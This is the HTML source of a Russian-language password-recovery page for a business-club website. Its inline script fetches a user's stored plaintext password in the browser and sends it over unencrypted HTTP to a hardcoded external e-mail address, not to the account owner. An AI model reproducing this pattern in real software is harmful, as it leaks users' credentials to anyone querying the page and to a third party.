<!DOCTYPE html>
<html lang="ru">
<head>
	<meta charset="UTF-8">
	<title>Document</title>
	<link rel="stylesheet" href="css/main.css">
	<link rel="stylesheet" href="css/font-awesome.min.css">
	<script src="dpd.js"></script>

	<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js"></script>
	<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.9.1/jquery-ui.min.js"></script>
	<script type="text/javascript" src="js/main.js"></script>
	<script>
		function SendRecover() {
			dpd.waclubusersgetit.get({username: $('#email_recover').val()}, function(results, error) {
					if (!$.isEmptyObject(results)) {
						var xmlhttp = new XMLHttpRequest();
						var email = $('#email_recover').val()
						var json = JSON.stringify({
   							from: "www.waclub-ru.ru",
  							to:  'vilord@sibmail.com',
    						message: "Восстановление пароля\nВаш логин:" + email + "\nВаш пароль:" + results[0].ownPass + "\nwaclub-ru.ru"
    					})
						xmlhttp.open("POST","http://mailnotes.web4.mobi/message");
						xmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
						xmlhttp.send(json);
						xmlhttp.onreadystatechange = function() {
   						if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
     					  console.log(xmlhttp.responseText);
 							}
						}
						console.log(results)
						} else {
							$(function () {
								$('.wrong-email').show()
							})
						}
				})
			}
	</script>
</head>
<body>
	<div class="recovering">
		<div class="recover-header">
			<a href="index.html" title="На главную">
			<img src="img/logo.svg" alt="logo">
			<h1 class="recover-h1">Пробный доступ</h1>
			<h3 class="recover-h2">в интеллектуальный клуб Winners Academy систему Бизнес - Чемпион</h3>
			</a>
		</div>
		<div class="recover-content">
			<div class="recover-content-header">Восстановление пароля</div>
			<div id="recover-form" class="recover-main-content">
				<form action="">
					<label for="email_recover">E-Mail</label>
					<input id="email_recover" name="email" type="e-mail" placeholder="Введите e-mail">
					<label for="email_recover" class="wrong-email">Введен невернрый Email</label>
					<input onclick="SendRecover()" id="recover_submit" type="button" value="Продолжить">
				</form>

			</div>
			<div id="recover-result" class="recover-result">
				<h3>Запрос обработан</h3>
				<p>Запрос на восстановление пароля был успешно обработан. Вы получите письмо с дальнейшими инструкциями на свой почтовый ящик, если аккаунт будет обнаружен..</p>
			</div>
		</div>
	</div>
</body>
</html>